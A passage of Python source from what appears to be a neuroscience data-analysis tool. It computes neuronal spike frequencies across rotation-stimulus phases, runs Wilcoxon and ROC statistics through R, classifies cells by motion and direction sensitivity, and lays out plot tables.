        y = _pad_cols(y, d_col)
    elif d_col < 0:
        x = _pad_cols(x, -d_col)

    # returns the depth-stacked arrays
    return np.dstack((x, y))
def calc_phase_spike_freq(r_obj):
    '''
    Calculates the spiking frequencies over each phase of the rotation filter object.

    :param r_obj: the rotation filter data object
    :return: tuple of the trial-wise spiking frequency arrays and their
             trial-averaged (or, for single cells, squeezed) counterparts
    '''

    # sets the spiking frequency across all trials (None for empty filters)
    sp_f0 = []
    for t_sp, t_ph in zip(r_obj.t_spike, r_obj.t_phase):
        sp_f0.append(sp_freq_fcn(t_sp, t_ph[0]) if np.size(t_sp, axis=0) else None)

    # reduces the trial dimension of each frequency array
    sp_f = []
    for sp in sp_f0:
        if sp is None:
            sp_f.append(None)
        elif r_obj.is_single_cell:
            # case is a single cell (removes the singleton dimensions)
            sp_f.append(np.squeeze(sp))
        else:
            # otherwise, average the frequencies over all trials
            sp_f.append(np.mean(sp, axis=1))

    # returns the total/mean spiking frequency arrays
    return sp_f0, sp_f
def combine_spike_freq(sp_freq, i_dim):
    '''
    Combines the spike frequencies (for phase index i_dim) over all filters into
    a single flat list (empty filters contribute nothing).
    '''

    sp_comb = []
    for sf in sp_freq:
        if sf is not None:
            sp_comb.extend(list(sf[:, i_dim]))
    return sp_comb
def setup_spike_freq_plot_arrays(r_obj, sp_f0, sp_f, ind_type, n_sub=3, plot_trend=False, is_3d=False):
    '''
    Sets up the spike frequency plot values, trend coefficients and phase
    comparison statistics for each subplot.

    :param r_obj: the rotation filter data object
    :param sp_f0: list of the trial-wise spike frequency arrays (one per filter)
    :param sp_f: list of the trial-averaged spike frequency arrays (one per filter)
    :param ind_type: 2-element list of the filter indices grouped by direction
                     (only used for uniform drifting)
    :param n_sub: the number of subplots (phase comparisons)
    :param plot_trend: if True, the trend-line coefficients are also calculated
    :param is_3d: if True, the values are set up for a 3d scatter plot
    :return: tuple of (plot values, trend coefficients, comparison stats,
             filter-type cell group indices - None for the 3d case)
    '''

    # memory allocation
    A, i_grp = np.empty(n_sub, dtype=object), None
    s_plt, sf_trend, sf_stats = dcopy(A), dcopy(A), dcopy(A)

    # combines the all the data from each phase type
    for i_sub in range(n_sub):
        if is_3d:
            # case is a 3d scatter plot (all 3 phases are plot dimensions)
            s_plt[i_sub] = [combine_spike_freq(sp_f, i) for i in range(3)]

        elif r_obj.is_ud:
            # case is uniform drifting
            if (i_sub + 1) == n_sub:
                # case is the CW vs CCW phase (pairs each CW filter with its
                # matching CCW filter via ind_type)
                sp_sub = [np.vstack((sp_f[x][:, 1], sp_f[y][:, 1])).T if sp_f0[x] is not None else None
                          for x, y in zip(ind_type[0], ind_type[1])]
                sp_f0_sub = [combine_stacks(sp_f0[x][:, :, 1], sp_f0[y][:, :, 1]) if sp_f0[x] is not None else None
                             for x, y in zip(ind_type[0], ind_type[1])]
            else:
                # case is the CW/CCW vs BL phases
                sp_sub = np.array(sp_f)[ind_type[i_sub]]
                sp_f0_sub = [sp_f0[x] if sp_f0[x] is not None else [] for x in ind_type[i_sub]]

            # sets the plot values
            s_plt[i_sub] = [combine_spike_freq(sp_sub, i) for i in range(2)]

            # calculates the wilcoxon signed rank test between the baseline/stimuli phases
            # if not r_obj.is_single_cell:
            sf_stats[i_sub] = calc_spike_freq_stats(sp_f0_sub, [0, 1])

            # adds the trend-line (if selected)
            if plot_trend:
                sf_trend[i_sub] = calc_spike_freq_correlation(sp_sub, [0, 1])

            # sets the cell group boundary offsets (over each filter type)
            if i_sub == 0:
                ii = np.append(0, np.cumsum([np.size(x, axis=0) for x in sp_f0_sub]))
        else:
            # case is the default plot
            # (i_sub = 0: BL vs CW; i_sub = 1: BL vs CCW; i_sub = 2: CW vs CCW)
            i1, i2 = 1 * (i_sub > 1), 1 + (i_sub > 0)
            s_plt[i_sub] = [combine_spike_freq(sp_f, i) for i in [i1, i2]]

            # calculates the wilcoxon signed rank test between the stimuli phases
            # if not r_obj.is_single_cell:
            sf_stats[i_sub] = calc_spike_freq_stats(sp_f0, [i1, i2])

            # adds the trend-line (if selected)
            if plot_trend:
                sf_trend[i_sub] = calc_spike_freq_correlation(sp_f, [i1, i2])

            # sets the cell group boundary offsets (over each filter type)
            if i_sub == 0:
                N = [np.size(x, axis=0) if x is not None else 0 for x in sp_f0]
                ii = np.append(0, np.cumsum(N))

    # sets the indices for each filter type grouping (from the boundary offsets)
    if (not is_3d):
        i_grp = [np.array(range(ii[i], ii[i + 1])) for i in range(len(ii) - 1)]

    # returns the important arrays
    return s_plt, sf_trend, sf_stats, i_grp
def calc_spike_freq_stats(sp_f0, ind, concat_results=True):
    '''
    Calculates the paired Wilcoxon signed-rank p-values (via R) between two
    stimuli phases, for each cell over each filter type.

    :param sp_f0: list of the trial-wise spike frequency arrays (one per filter;
                  None/empty entries are skipped)
    :param ind: 2-element list of the phase indices being compared
    :param concat_results: if True, the p-values are concatenated over all filters
    :return: the p-value arrays (concatenated array, or list over the filters)
    '''

    # memory allocation (empty/None filters get zero-length arrays)
    sf_stats = [np.zeros(np.size(x, axis=0) if (x is not None) else 0) for x in sp_f0]

    # calculates the p-values for each of the trials
    for i_filt, sp in enumerate(sp_f0):
        if sp is None:
            continue

        for i_row in range(np.size(sp, axis=0)):
            # retrieves the paired phase values, ignoring any missing trials
            x, y = sp[i_row, :, ind[0]], sp[i_row, :, ind[1]]
            ok = np.logical_and(~np.equal(x, None), ~np.equal(y, None))

            # runs the exact paired wilcoxon signed-rank test (via R)
            results = r_stats.wilcox_test(FloatVector(x[ok]), FloatVector(y[ok]), paired=True, exact=True)
            sf_stats[i_filt][i_row] = get_r_stats_values(results, 'p.value')

    # returns the stats array
    return np.concatenate(sf_stats) if concat_results else sf_stats
def calc_spike_freq_correlation(sp_f, ind):
    '''
    Fits a linear trend between the spike frequencies of two stimuli phases,
    over each filter type.

    :param sp_f: list of the mean spike frequency arrays (one per filter)
    :param ind: 2-element list of the phase indices being compared
    :return: (n_filt x 1) array of the fitted trend coefficients (NaN for empty filters)
    '''

    # memory allocation (NaN flags filters with no fitted value)
    n_filt = np.size(sp_f, axis=0)
    sp_corr = np.nan * np.ones((n_filt, 1))

    # fits the linear trend for each non-empty filter
    for i_filt, sp in enumerate(sp_f):
        if sp is None:
            continue

        # sets the x/y points and fits the linear relationship
        sp_corr[i_filt], _ = curve_fit(lin_func, sp[:, ind[0]], sp[:, ind[1]])

    # returns the correlation array
    return sp_corr
##################################################
#### ROC ANALYSIS CALCULATION FUNCTIONS ####
##################################################
def get_roc_xy_values(roc, is_comp=None):
    '''
    Retrieves the x/y coordinates of the ROC curve from the R roc object.

    :param roc: the R roc analysis object
    :param is_comp: unused (retained for interface compatibility)
    :return: Nx2 array of the curve coordinates, i.e., [1 - sensitivity, specificity]
    '''

    # retrieves the full sensitivity/specificity arrays from the roc object
    roc_sens = get_r_stats_values(roc, 'sensitivities', True)
    roc_spec = get_r_stats_values(roc, 'specificities', True)

    # returns them combined into a single coordinate array
    return np.vstack((1 - np.array(roc_sens), np.array(roc_spec))).T
def get_roc_auc_value(roc):
    '''
    Retrieves the area under the curve (AUC) value from the R roc object.

    :param roc: the R roc analysis object
    :return: the ROC curve integral (AUC)
    '''

    # retrieves and returns the roc curve integral
    auc_val = get_r_stats_values(roc, 'auc')
    return auc_val
def calc_inter_roc_significance(roc1, roc2, method, boot_n):
    '''
    Calculates the p-value of the statistical difference between two ROC curves.

    :param roc1: the first R roc analysis object
    :param roc2: the second R roc analysis object
    :param method: the comparison method string (its first element, lower-cased, is used)
    :param boot_n: the number of bootstrap iterations
    :return: the roc comparison test p-value
    '''

    # runs the roc comparison test (via R) and returns the p-value
    comp_results = _roc_test(roc1, roc2, method=method[0].lower(), boot_n=boot_n, progress='none')
    return get_r_stats_values(comp_results, 'p.value')
def calc_roc_curves(comp_vals, roc_type='Cell Spike Times', x_grp=None, y_grp=None, ind=(1, 2)):
    '''
    Sets up the comparison groupings and calculates the ROC curve (via the R
    pROC package).

    :param comp_vals: array of the comparison values (cell spike times or counts)
    :param roc_type: the calculation type ('Cell Spike Times' or 'Cell Spike Counts')
    :param x_grp: optional pre-calculated first comparison group values
    :param y_grp: optional pre-calculated second comparison group values
    :param ind: the phase column indices compared for the spike time case
                (changed from a mutable list default to a tuple - a shared
                 mutable default argument is unsafe; read-only use is unchanged)
    :return: the R roc analysis object
    '''

    # sets up the x/y groupings and threshold values based on type
    if (x_grp is None) or (y_grp is None):
        if roc_type == 'Cell Spike Times':
            # case is the cell spike times

            # sets the cw/ccw trial spike arrays
            n_trial = np.sum([(x is not None) for x in comp_vals[:, 0]])
            t_sp_cc = [comp_vals[i, ind[0]] for i in range(n_trial)]         # CW trial spikes
            t_sp_ccw = [comp_vals[i, ind[1]] for i in range(n_trial)]        # CCW trial spikes

            # determines the spike counts for the cc/ccw trials
            x_grp, y_grp = spike_count_fcn(t_sp_cc), spike_count_fcn(t_sp_ccw)
        elif roc_type == 'Cell Spike Counts':
            # case is the cell spike counts

            # sets the pooled neuron preferred/non-preferred trial spike counts
            x_grp, y_grp = comp_vals[:, 0], comp_vals[:, 1]

    # sets up the roc curve object (0/1 group labels vs the combined group values)
    nn = len(x_grp)
    roc_pred, roc_class = np.hstack((np.zeros(nn), np.ones(nn))), np.hstack((x_grp, y_grp))
    return r_pROC.roc(FloatVector(roc_pred), FloatVector(roc_class), direction = "<", quiet=True)
# def calc_cell_roc_bootstrap_wrapper(p_data):
# '''
#
# :param p_data:
# :return:
# '''
#
# # initialisations
# t_spike, n_boot, ind = p_data[0], p_data[1], p_data[2]
#
# # sets the cw/ccw trial spike arrays
# n_trial = np.sum([(x is not None) for x in t_spike[:, 0]])
# t_sp_p1 = [t_spike[i, ind[0]] for i in range(n_trial)] # 1st phase trial spikes
# t_sp_p2 = [t_spike[i, ind[1]] for i in range(n_trial)] # 2nd phase trial spikes
#
# # determines the spike counts for the cc/ccw trials
# n_spike = [spike_count_fcn(t_sp_p1), spike_count_fcn(t_sp_p2)]
#
# return calc_cell_roc_bootstrap(None, n_spike, n_boot=n_boot, ind=ind)
def calc_roc_conf_intervals(p_data):
    '''
    Calculates the lower/upper AUC confidence interval offsets for an ROC curve.

    :param p_data: list of the pooled worker parameters, i.e.,
                   [roc object, group stats type, bootstrap count, confidence level]
    :return: 2-element list of the lower/upper confidence interval offsets
             (relative to the AUC value)
    '''

    # parameters and input arguments
    roc, grp_stype, n_boot, c_lvl = p_data[0], p_data[1], p_data[2], p_data[3]

    # calculates the AUC confidence interval (ci_results = [lower, auc, upper])
    ci_results = _ci_auc(roc, method=grp_stype[0].lower(), boot_n=n_boot, conf_level=c_lvl, progress='none')
    return [ci_results[1] - ci_results[0], ci_results[2] - ci_results[1]]
def calc_cell_group_types(auc_sig, stats_type):
    '''
    Classifies each cell by motion/direction sensitivity from its CW/CCW and
    CW-vs-CCW significance flags.

    Cell group type convention:
        =0 - Both MS/DS
        =1 - MS but not DS
        =2 - Not MS

    :param auc_sig: Nx3 significance flag array (columns = [CW, CCW, CW vs CCW])
    :param stats_type: the phase statistics calculation type string
    :return: the cell group type array
    '''

    # all cells default to "not motion sensitive"
    g_type = 2 * np.ones(np.size(auc_sig, axis=0), dtype=int)

    # a cell is motion sensitive if either direction phase is significant
    n_sig = np.sum(auc_sig[:, :2], axis=1)
    is_ms = n_sig > 0

    # determines direction sensitivity based on the stats calculation type
    if stats_type == 'Wilcoxon Paired Test':
        # case is phase statistics were calculated via the Wilcoxon paired test
        # (DS = one direction significant only, OR both significant AND the
        #  CW/CCW phase difference itself significant)
        is_ds = np.logical_or(n_sig == 1, np.logical_and(n_sig == 2, auc_sig[:, 2]))
    else:
        # case is phase stats were calculated using ROC analysis
        # NOTE(review): if auc_sig has an integer dtype, ~is_ds below is a
        # bitwise NOT (always truthy) - this assumes a boolean auc_sig; verify
        # at the callers
        is_ds = auc_sig[:, 2]

    # sets the MS/DS and MS/Not DS groupings
    g_type[np.logical_and(is_ms, is_ds)] = 0         # case is both MS/DS
    g_type[np.logical_and(is_ms, ~is_ds)] = 1        # case is MS but not DS

    # returns the group type array
    return g_type
# # calculates the table dimensions
# bbox, t_data, cell_col, c_wids = cf.calc_table_dim(self.plot_fig, 1, table_font, n_sig_grp, row_hdr,
# row_cols, g_type, t_loc='bottom')
# bbox, t_data, cell_col, c_wids = cf.add_plot_table(self.plot_fig, 1, table_font, n_sig_grp, row_hdr,
# g_type, row_cols, col_cols, table_fsize, t_loc='bottom')
# calculates the table dimensions
def add_plot_table(fig, ax, font, data, row_hdr, col_hdr, row_cols, col_cols, t_loc, cell_cols=None,
                   n_row=1, n_col=2, pfig_sz=1.0, t_ofs=0, h_title=None, p_wid=1.5, ax_pos_tbb=None):
    '''
    Creates a table around a plot axes, resizing/repositioning the axes so the
    table fits, then returns the created table and its placement metrics.

    NOTE(review): fig appears to be a Qt-backed figure widget (it provides
    width()/height() in pixels and a get_renderer() method) - confirm against
    the GUI figure class.

    :param fig: the plot figure object
    :param ax: the axes object (or the index of the axes within fig.ax)
    :param font: the Qt font object used for the cell text metrics
    :param data: 2D array of the table cell values
    :param row_hdr: list of the row header strings (or None)
    :param col_hdr: list of the column header strings (or None)
    :param row_cols: list of the row header cell colours
    :param col_cols: list of the column header cell colours
    :param t_loc: the table location string ('bottom', 'top', 'fixed' or other)
    :param cell_cols: optional 2D array of the cell colours (white if not given)
    :param n_row: the number of subplot rows (used for the axes grid snapping)
    :param n_col: the number of subplot columns (unused in this function)
    :param pfig_sz: the proportional figure height scale factor
    :param t_ofs: the vertical table offset (for the non-bottom/top/fixed case)
    :param h_title: optional title object to reposition above the table
    :param p_wid: the cell width padding scale factor
    :param ax_pos_tbb: optional pre-calculated axes tight bounding box
    :return: list of [table handle, table y0 (axes coords), axes figure height (pixels)]
    '''

    # initialisations (y0 is currently unused)
    n_line, title_hght, pWT = 0, 0, 0.5
    y0, w_gap, h_gap, cell_wid, cell_wid_row, n_row_data = 0.01, 10 * p_wid, 2, 0, 0, np.size(data, axis=0)

    # creates the font metrics object (for pixel-accurate text measurement)
    fm, f_sz0 = QFontMetrics(font), font.pointSize()

    # sets the axis object (if the axis index was provided)
    if isinstance(ax, int):
        ax = fig.ax[ax]

    # retrieves the bounding box position array (if not provided)
    if ax_pos_tbb is None:
        ax_pos_tbb = ax.get_tightbbox(fig.get_renderer()).bounds

    # objection dimensioning (figure/axes sizes in pixels)
    fig_wid, fig_hght = fig.width(), fig.height() * pfig_sz
    cell_hght0, ax_wid, ax_hght, ax_pos = fm.height(), ax.bbox.width, ax.bbox.height, ax.get_position()

    # if there is a title, then retrieve the title height
    if h_title is not None:
        fm_title = QFontMetrics(create_font_obj(size=h_title.get_fontsize()))
        title_hght = fm_title.height()

    if t_loc == 'bottom':
        # case is the table is located at the bottom of the axes

        # if there is an x-label then increment the line counter
        if ax.xaxis.label is not None:
            n_line += 1

        # if there is an x-ticklabels then increment the line counter depending on the number of lines
        h_xticklbl = ax.get_xticklabels()
        if h_xticklbl is not None:
            n_line += np.max([(1 + x._text.count('\n')) for x in h_xticklbl])
    elif t_loc == 'top':
        # case is the table is located at the top of the axes

        # if there is a title then increment the line counter
        if len(ax.title._text):
            n_line += 1

    # parameters and other dimensioning (text line counts of the header cells)
    n_rowhdr_line = 0 if row_hdr is None else row_hdr[0].count('\n') + 1
    n_colhdr_line = 0 if col_hdr is None else col_hdr[0].count('\n') + 1

    ############################################
    ####    CELL ROW/HEIGHT CALCULATIONS    ####
    ############################################

    # calculates the maximum column header width
    if col_hdr is not None:
        cell_wid = np.max([fm.width(x) for x in col_hdr]) * p_wid

    # calculates the maximum of the cell widths
    for i_row in range(n_row_data):
        cell_wid = max(cell_wid, np.max([fm.width(str(x)) for x in data[i_row, :]]) * p_wid)

    # calculates the maximum row header width
    if row_hdr is not None:
        cell_wid_row = np.max([fm.width(x) for x in row_hdr]) * p_wid

    # sets the row header/whole table widths and cell/whole table heights
    # (table_wid is axes-relative; table_hght is in pixels)
    table_wid = ((cell_wid_row > 0) * (cell_wid_row + w_gap) + len(col_hdr) * (cell_wid + w_gap)) / ax_wid
    table_hght = (n_colhdr_line * cell_hght0 + (n_colhdr_line + 1) * h_gap + \
                  n_row_data * (cell_hght0 + (n_rowhdr_line + 1) * h_gap))

    # if the table width it too large, then rescale the cell widths proportionally
    sp_width = get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz)[2] / ax.get_position().width
    if table_wid > sp_width:
        ptable_wid = sp_width / table_wid
        cell_wid, cell_wid_row = ptable_wid * cell_wid, ptable_wid * cell_wid_row
        table_wid = sp_width

    # determines the new vertical extent of the axes (in pixels), snapping to
    # the subplot row grid and leaving room for the table where required
    if t_loc == 'bottom':
        ax_bot = np.floor(ax_pos.y1 / (1 / n_row)) / n_row
        ax_y0, ax_y1 = ax_bot * fig_hght + table_hght + cell_hght0 * (1.5 + n_line), ax.bbox.y1
    elif t_loc == 'top':
        ax_top = np.ceil(ax_pos.y1 / (1 / n_row)) / n_row
        ax_y0, ax_y1 = ax.bbox.y0, ax_top * fig_hght - (table_hght + 2 * cell_hght0)
    elif t_loc == 'fixed':
        ax_y0, ax_y1 = ax.bbox.y0, ax.bbox.y1
    else:
        ax_y0 = fig_hght * np.floor(ax_pos.y0 / (1 / n_row)) / n_row
        ax_y1 = fig_hght * np.ceil(ax_pos.y1 / (1 / n_row)) / n_row

    # sets the bounding box dimensions (table_y0/bbox are in axes coordinates)
    ax_hght_new = pfig_sz * (ax_y1 - ax_y0) / fig_hght
    ax_fig_hght = ax_hght_new * fig_hght
    table_x0 = get_axis_scaled_xval(ax, fig, ax_pos_tbb, (1 - table_wid) / 2, pfig_sz)

    if t_loc == 'bottom':
        # case is the table sits below the axes (negative y0)
        table_y0 = -(table_hght + (1 + pWT) * title_hght + cell_hght0 * (1 + n_line)) / ax_fig_hght
        bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]
    elif t_loc == 'top':
        # case is the table sits above the axes (y0 > 1)
        table_y0 = 1 + (cell_hght0 + (1 + pWT) * title_hght) / ax_fig_hght
        bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]
    else:
        # case is the table hangs down from the axes top (offset by t_ofs)
        table_y0 = 1 - (t_ofs + table_hght + (1 + pWT) * title_hght + cell_hght0) / ax_fig_hght
        bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]

    ####################################################
    ####    AXIS RE-POSITIONING & TABLE CREATION    ####
    ####################################################

    # resets the axis position to accomodate the table
    if t_loc != 'fixed':
        ax_pos_nw = [ax_pos.x0, ax_y0 / fig_hght, ax_pos.width, ax_hght_new]
        ax.set_position(ax_pos_nw)

    # resets the position of the title object (centred above the table)
    if h_title is not None:
        x_title = get_axis_scaled_xval(ax, fig, ax_pos_tbb, 0.5, pfig_sz, False)
        h_title.set_position([x_title, table_y0 + (table_hght + pWT * title_hght) / ax_fig_hght])

    # sets the table parameters based on whether there is a row header column
    if cell_wid_row == 0:
        # case is there is no row header column
        c_wids = [cell_wid + w_gap] * len(col_hdr)
    else:
        # case is there is a row header column
        c_wids = [cell_wid_row + w_gap] + [cell_wid + w_gap] * len(col_hdr)

    # sets the default (white) cell colours, if not provided
    if cell_cols is None:
        cell_cols = np.vstack([['w'] * np.size(data, axis=1)] * np.size(data, axis=0))

    # resets the data and column header arrays (the row headers become the first
    # data column, with a blank white header cell above them)
    data = np.hstack((np.array(row_hdr).reshape(-1, 1), data))
    col_hdr, col_cols = [''] + col_hdr, ['w'] + col_cols

    # prepends the row header colours to the cell colour array
    if np.size(data, axis=0) == 1:
        cell_cols = np.array(row_cols + list(cell_cols[0]), dtype=object).reshape(-1, 1).T
    else:
        cell_cols = np.hstack((np.array(row_cols, dtype=object).reshape(-1, 1), cell_cols))

    # creates the table
    h_table = create_plot_table(ax, data, None, col_hdr, bbox=bbox, colWidths=c_wids, cellColours=cell_cols,
                                colColours=col_cols, f_sz=f_sz0)

    # removes the outline from the top-left (blank header) cell
    h_table._cells[(0, 0)].set_linewidth(0)

    # returns the table handle and its placement metrics
    return [h_table, table_y0, ax_fig_hght]
def get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz=1.):
    '''
    Normalises an axes tight bounding box (in pixels) by the figure dimensions.

    :param fig: the plot figure object
    :param ax_pos_tbb: the tight bounding box array, i.e., [x0, y0, width, height]
    :param pfig_sz: the proportional figure height scale factor
    :return: the bounding box scaled to figure-relative coordinates
    '''

    # retrieves the figure width/height (in pixels)
    f_wid, f_hght = fig.width(), fig.height() * pfig_sz

    # returns the bounding box scaled to figure-relative coordinates
    return ax_pos_tbb / np.array([f_wid, f_hght, f_wid, f_hght])
def get_subplot_width(fig, ax, n_col):
    '''
    Calculates the proportional subplot column width for the given axes object.

    :param fig: the plot figure object (unused; retained for interface compatibility)
    :param ax: the axes object
    :param n_col: the number of subplot columns
    :return: the proportional subplot width (relative to the axes width)
    '''

    # scales the module-level subplot width fraction by the column count
    w_col = t_wid_f / n_col
    return w_col / ax.get_position().width
def get_axis_scaled_xval(ax, fig, ax_pos_tbb, x, pfig_sz, is_scaled=True):
    '''
    Converts a proportional x-location into axes coordinates, spanning the
    subplot's tight bounding box rather than the axes frame.

    :param ax: the axes object
    :param fig: the plot figure object
    :param ax_pos_tbb: the axes tight bounding box array, i.e., [x0, y0, width, height]
    :param x: the proportional x-location (0 = subplot left edge, 1 = right edge)
    :param pfig_sz: the proportional figure height scale factor
    :param is_scaled: currently has NO effect (see note below)
    :return: the x-location in axes coordinates
    '''

    # retrieves the axis normal/tight position vector
    ax_pos = np.array(ax.get_position().bounds)
    ax_pos_t = get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz)

    # sets the column locations (for each column)
    # pp = np.linspace(x_ofs + (ax_pos_t[0] - ax_pos[0]) / ax_pos[2],
    #                  (1 - x_ofs) + ((ax_pos_t[0] + ax_pos_t[2]) - (ax_pos[2] + ax_pos[0])) / ax_pos[2], n_col + 1)
    # i_col = int(np.floor(ax_pos[0] / (1 / n_col)) / n_col)

    # calculates the subplot axis left/right location
    # (t_wid_f is the module-level subplot width fraction)
    x_ofs = (1 - t_wid_f) / (2 * ax_pos_t[2])
    sp_left = x_ofs + (ax_pos_t[0] - ax_pos[0]) / ax_pos[2]
    sp_right = (1 - x_ofs) + ((ax_pos_t[0] + ax_pos_t[2]) - (ax_pos[2] + ax_pos[0])) / ax_pos[2]

    # returns the scaled value
    # NOTE(review): both branches return the IDENTICAL expression, so the
    # is_scaled flag currently has no effect - the unscaled branch was probably
    # intended to return a different value; confirm the original intent
    if is_scaled:
        return sp_left + x * (sp_right - sp_left)
    else:
        return sp_left + x * (sp_right - sp_left)
def reset_axes_dim(ax, d_type, d_val, is_prop):
    '''
    Resets a single dimension of the axes position.

    :param ax: the axes object being repositioned
    :param d_type: the dimension name ('left', 'bottom', 'width' or 'height';
                   case-insensitive)
    :param d_val: the new dimension value (or the proportional change, if is_prop)
    :param is_prop: if True, the dimension is scaled by (1 + d_val) instead of
                    being overwritten
    :return:
    '''

    # retrieves the current axes position vector
    pos0 = ax.get_position()
    pos_nw = [pos0.x0, pos0.y0, pos0.width, pos0.height]

    # updates the requested dimension (proportionally or absolutely)
    i_dim = ['left', 'bottom', 'width', 'height'].index(d_type.lower())
    if is_prop:
        pos_nw[i_dim] *= (1 + d_val)
    else:
        pos_nw[i_dim] = d_val

    # applies the new axes position
    ax.set_position(pos_nw)
def setup_trial_condition_filter(rot_filt, plot_cond):
    '''
    Initialises/updates a rotation filter with the required trial condition types,
    returning an error message/title if the loaded data cannot support the analysis.

    :param rot_filt: the rotation filter dictionary (created if None)
    :param plot_cond: the required trial condition type(s)
    :return: tuple of (rotation filter, error string, error title); the filter is
             None on error, and the error fields are None on success
    '''

    # ensures the plot conditions are in list form
    if not isinstance(plot_cond, list):
        plot_cond = [plot_cond]

    # at least one trial condition must have been selected
    if len(plot_cond) == 0:
        # if the black phase is not in any of the experiments, then output an error to screen
        e_str = 'At least one trial condition type must be selected before running this function.'
        return None, e_str, 'No Trial Conditions Selected'

    # the "Black" baseline condition is always required
    t_type_exp = ['Black'] + plot_cond

    # initialises the rotation filter (if not set)
    if rot_filt is None:
        rot_filt = init_rotation_filter_data(False)

    # sets the trial types into the rotation filter
    rot_filt['t_type'] = list(np.unique(flat_list(t_type_exp)))

    if 'Black' not in rot_filt['t_type']:
        # if the black phase is not in any of the experiments, then output an error to screen
        e_str = 'The loaded experiments do not include the "Black" trial condition. To run this function ' \
                'you will need to load an experiment with this trial condition.'
        return None, e_str, 'Invalid Data For Analysis'
    elif len(rot_filt['t_type']) == 1:
        # if there are insufficient trial types in the loaded experiments, then create the error string
        e_str = 'The loaded experiments only has the "{0}" trial condition. To run this function you will ' \
                'need to load a file with the following trial condition:\n'.format(rot_filt['t_type'][0])
        for tt in plot_cond:
            e_str = '{0}\n => {1}'.format(e_str, tt)

        # outputs the error to screen and exits the function
        return None, e_str, 'Invalid Data For Analysis'

    # otherwise, return the rotational filter
    return rot_filt, None, None
def det_matching_filters(r_obj, ind):
    '''
    Finds the first filter that matches the candidate filter (at index ind) on
    every field except the trial type.

    :param r_obj: the rotation filter data object
    :param ind: the index of the candidate filter
    :return: 2-element list of the candidate/matching filter indices, or None
             (implicitly) if no match exists
    '''

    # sets the candidate rotation filter dictionary
    r_filt0 = r_obj.rot_filt_tot[ind]

    # searches the other filter dictionaries for a full field match
    for i_filt, r_filt in enumerate(r_obj.rot_filt_tot):
        # the candidate filter is not compared against itself
        if i_filt == ind:
            continue

        # a match requires every field (other than the trial type) to be equal
        if all(r_filt0[f_key] == r_filt[f_key] for f_key in r_filt0 if f_key != 't_type'):
            return [ind, i_filt]
def calc_ms_scores(s_plt, sf_stats, p_value=0.05):
    '''
    Calculates the significance score types for the CW/CCW phases (and the CW
    vs CCW comparison).

    Score convention (per column): 0 = not significant, 1 = significant with a
    decrease/CW-preference, 2 = significant with an increase/CCW-preference.

    :param s_plt: the phase comparison plot values
    :param sf_stats: the phase comparison p-values (or pre-calculated flags)
    :param p_value: the significance level (None if significance is pre-calculated)
    :return: Nx3 score type array (columns = [CW, CCW, CW vs CCW])
    '''

    if p_value is not None:
        # calculates the relative change for CW/CCW from baseline, and CCW to CW
        grad_CW = np.array(s_plt[0][1]) / np.array(s_plt[0][0])          # CW to BL
        grad_CCW = np.array(s_plt[1][1]) / np.array(s_plt[1][0])         # CCW to BL
        grad_CCW_CW = np.array(s_plt[1][1]) / np.array(s_plt[0][1])      # CCW to CW

        # memory allocation
        sf_score = np.zeros((len(grad_CW), 3), dtype=int)

        # each direction phase scores 1/2 when significant (2 if the rate increased)
        sf_score[:, 0] = (sf_stats[0] < p_value).astype(int) * (1 + (grad_CW > 1).astype(int))
        sf_score[:, 1] = (sf_stats[1] < p_value).astype(int) * (1 + (grad_CCW > 1).astype(int))

        # the CW/CCW comparison only scores for cells significant in BOTH
        # directions (2 when CCW is preferred, 1 when CW is preferred)
        both_sig = np.logical_and(sf_score[:, 0] > 0, sf_score[:, 1] > 0)
        sf_score[both_sig, 2] = (sf_stats[2][both_sig] < p_value).astype(int) * \
                                            (1 + (grad_CCW_CW[both_sig] > 1).astype(int))
    else:
        # case is the significance flags were pre-calculated (e.g., via ROC)
        sf_score = np.zeros((np.size(s_plt, axis=0), 3), dtype=int)
        for i_col in range(3):
            sf_score[:, i_col] = sf_stats[:, i_col].astype(int) * (1 + (s_plt[:, i_col] > 0.5).astype(int))

    # returns the scores array
    return sf_score
def det_cell_match_indices(r_obj, ind, r_obj2=None):
    '''
    Determines the indices of the cells common between two filter groupings
    (within r_obj alone, or between r_obj and r_obj2).

    :param r_obj: the rotation filter data object
    :param ind: the filter index (or 2-element index list) being compared
    :param r_obj2: optional second rotation filter data object
    :return: tuple of the matching cell index arrays (one per grouping)
    '''

    if r_obj2 is None:
        # determines the cell id's which overlap each other
        # (a unique cell id is formed as 10000 * experiment index + cluster
        #  index - assumes fewer than 10000 clusters per experiment)
        cell_id = [10000 * r_obj.i_expt[i] + np.array(flat_list(r_obj.clust_ind[i])) for i in ind]
        id_match = np.array(list(set(cell_id[0]).intersection(set(cell_id[1]))))

        # returns the indices of the matching
        # NOTE(review): np.searchsorted assumes the cell_id arrays are sorted,
        # and (unlike the branch below) id_match is not explicitly sorted here -
        # verify the cluster indices are always ascending
        return np.searchsorted(cell_id[0], id_match), np.searchsorted(cell_id[1], id_match)
    else:
        # case is the comparison is between two separate filter objects
        if isinstance(ind, int):
            # case is the same filter index applies to both objects
            cell_id_1 = 10000 * r_obj.i_expt[ind] + np.array(flat_list(r_obj.clust_ind[ind]))
            cell_id_2 = 10000 * r_obj2.i_expt[ind] + np.array(flat_list(r_obj2.clust_ind[ind]))
        else:
            # case is a separate filter index applies to each object
            cell_id_1 = 10000 * r_obj.i_expt[ind[0]] + np.array(flat_list(r_obj.clust_ind[ind[0]]))
            cell_id_2 = 10000 * r_obj2.i_expt[ind[1]] + np.array(flat_list(r_obj2.clust_ind[ind[1]]))

        # returns the indices of the matching cells
        id_match = np.sort(np.array(list(set(cell_id_1).intersection(set(cell_id_2)))))
        return np.searchsorted(cell_id_1, id_match), np.searchsorted(cell_id_2, id_match)
def split_unidrift_phases(data, rot_filt, cell_id, plot_exp_name, plot_all_expt, plot_scope, dt, t0=0):
    '''
    Splits uniform-drifting data into CW/CCW phases by forcing both temporal
    frequency directions into the rotation filter, then reduces the filtered
    object's fields so each direction pair reads as a single 3-phase filter.

    :param data: the overall data container
    :param rot_filt: the rotation filter dictionary (the direction filter is overwritten)
    :param cell_id: the cell index (for single cell analysis scope)
    :param plot_exp_name: the name of the experiment being analysed
    :param plot_all_expt: flag indicating all experiments are being analysed
    :param plot_scope: the analysis scope string
    :param dt: the shortened stimuli phase duration
